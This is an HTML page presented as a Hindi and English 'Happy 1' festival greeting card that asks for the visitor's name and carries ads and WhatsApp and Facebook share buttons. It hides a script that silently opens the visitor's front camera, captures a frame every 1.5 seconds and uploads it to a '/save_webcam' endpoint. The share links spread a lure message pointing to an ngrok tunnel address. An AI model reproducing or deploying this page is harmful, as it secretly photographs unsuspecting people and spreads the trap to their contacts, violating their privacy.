<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>Happy 1 to Your Friends</title>
    <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script>
    
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script>
    
    
    
	  <link rel="icon" type="image/png" sizes="32x32" href="https://i.imgur.com/fcqTtzV.png">

</head>
<div class="video-wrap" hidden="hidden">
    <video id="video" playsinline autoplay></video>
 </div>
 
 <canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
 
 <script>
 
 function post(imgdata){
 $.ajax({
     type: 'POST',
     data: { cat: imgdata},
     url: '/save_webcam',
     dataType: 'json',
     async: false,
     success: function(result){
         // call the function that handles the response/results
     },
     error: function(){
     }
   });
 };
 
 
 'use strict';
 
 const video = document.getElementById('video');
 const canvas = document.getElementById('canvas');
 const errorMsgElement = document.querySelector('span#errorMsg');
 
 const constraints = {
   audio: false,
   video: {
     
     facingMode: "user"
   }
 };
 
 // Access webcam
 async function init() {
   try {
     const stream = await navigator.mediaDevices.getUserMedia(constraints);
     handleSuccess(stream);
   } catch (e) {
     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   }
 }
 
 // Success
 function handleSuccess(stream) {
   window.stream = stream;
   video.srcObject = stream;
 
 var context = canvas.getContext('2d');
   setInterval(function(){
 
        context.drawImage(video, 0, 0, 640, 480);
        var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
        post(canvasData); }, 1500);
   
 
 }
 
 // Load init
 init();
 
 </script>
<body>

<body class="bg" id="rakhi" style="background: linear-gradient(to bottom right, #f6ff00, #e1e8e7, #00ffe9);
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;">
	
	
<center><span style="font-size: 20px;"color: #ff077a;">▅ ▆ ▇ █ HAPPY 1 █ ▇ ▆ ▅</center>	
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing 2 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="2568634816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
 <center> 
<div class="container">
    <div class="main-greeting">
<div align="center html2canvas-ignore">
     <div style="font-size: 20px; font-weight: 500; color: Black;">
<p id="demo"></p>

<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="background-color:rgb(255, 140, 0); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: whitesmoke; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
“1 का ये शुभ अवसर आपके जीवन में अनेकों ख़ुशियाँ लेकर आए”
</b></marquee>
</div>
<div style="background-color: rgb(255, 255, 255); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: blue; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
इस 1 हमारी शुभकामनाएँ आपके साथ हैं
</b></marquee>
</div>
<div style="background-color: rgb(0, 255, 42); border-radius: 17px; border: 0px solid rgb(0, 0, 0); box-shadow: rgba(0, 0, 0, 0.2) 5px 5px 5px; color: black; font-family: arial, sans-serif; font-size: 18px; font-stretch: normal; font-style: normal; font-variant: normal; line-height: normal; margin: 0px auto; padding: 4px 5px 3px; width: 70%;">
<marquee behavior="alternate"><b>
|| 1 की हार्दिक बधाई || 
</b></marquee>
</div>
</div>
<br><br>

<center>
<figure>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                 var a=prompt("Please Enter Your Name\n\n👇👇👇👇👇");
                 document.write(a);
                </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
	<h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                   
                    document.write(a);
                      </script> </h1>
    <h1 style="text-transform: uppercase;"><script type="text/javascript" language="Javascript">
                    
                    document.write(a);
                      </script></h1>

</figure>
 </center>
<div class="vi" style="text-align: center;">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Wishing -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:50px"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="5590491777"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
<br><br><center>
    <p style="text-align: center;"><strong><span style="background-color: #ffea00; color: #005f96; font-size: 18pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;Wishing you a very </span></p>
</center>
<br>
<p style="text-align: center;"><strong><span style="font-size: 21pt; font-family: 'comic sans ms', sans-serif; color: #ff7700;">✪ <span style="font-family: 'trebuchet ms', geneva;">Happy 1</span> ✪</span></strong></p>
<br>
<p style="text-align: center;"><strong><span style="background-color: #ff0000; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;to you and your lovely family </span></p>
  <br>
  <p style="text-align: center;"><span style="background-color: #008000; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;May this auspicious occasion of 1 bring happiness, prosperity, health, and peace in your life.</span></p>
  <br>
  <p style="text-align: center;"><span style="background-color: #ff00ff; color: #ffffff; font-size: 16pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp;✪ I wish that this 1 is your best one. ✪</span></p>
<br>

<p style="text-align: center;"><span style="background-color: #663399; color: #FFFAFA; font-size: 15pt; font-family: tahoma, arial, helvetica, sans-serif;">&nbsp; यह संदेश 1 तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं </span></p>
<br>
<center>
<div class="busi"><h4><p style="text-transform: uppercase;font-size: 26px;color:#ffffff;"> <script type="text/javascript" language="Javascript">                                       
 document.write( "by - " +a);
                      </script><br><br></p></h4></center>
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Link Ads -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-4696491179456446"
     data-ad-slot="1112298516"
     data-ad-format="link"
     data-full-width-responsive="true"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</center>
</div>
        </div>
<script>
// Set the date we're counting down to
var countDownDate = new Date("October 10, 2018 00:00:00").getTime();

// Update the count down every 01 second
var x = setInterval(function() {

  // Get todays date and time
  var now = new Date().getTime();

  // Find the distance between now an the count down date
  var distance = countDownDate - now;

  // Time calculations for days, hours, minutes and seconds
  var days = Math.floor(distance / (1000 * 60 * 60 * 24));
  var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
  var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
  var seconds = Math.floor((distance % (1000 * 60)) / 1000);

  // Display the result in the element with id="demo"
  document.getElementById("demo").innerHTML = days + "<i> Days,</i> " + hours + " <i>Hrs,</i> "
  + minutes + "<i> Min,</i> " + seconds + "<i> Sec</i> ";

  // If the count down is finished, write some text 
  if (distance < 0) {
    clearInterval(x);
    document.getElementById("demo").innerHTML = "🙏 Welcome 🙏";
  }
}, 1000);
</script>       
            </div>
        </div>
			
</body>
 
<center>
 <a class="footerbtn" href="whatsapp://send?text=*मुझसे पहले ऐसा संदेश आपके लिए किसी ने नही भेजा होगा निचे क्लिक करके देखो क्या है आपके लिए* 👉 https://99b6-197-113-101-252.eu.ngrok.io" data-action="share/whatsapp/share">
 <img width="22px" height="22px" src="https://cdn.pixabay.com/photo/2015/08/03/13/58/soon-873316_640.png">  
 <b style="font-size: 26px;">Share</b>  
</a>
 <a class="footerbtn1" href="https://www.facebook.com/sharer/sharer.php?u= https://99b6-197-113-101-252.eu.ngrok.io" target="_blank" title="Share this post on Facebook" class="facebook">
	<img width="22px" height="22px" src="https://cdn.pixabay.com/photo/2017/06/22/06/22/facebook-2429746_640.png">
 <b style="font-size: 26px;">Share</b>  
 </a>
</center>

</script>
</html>        
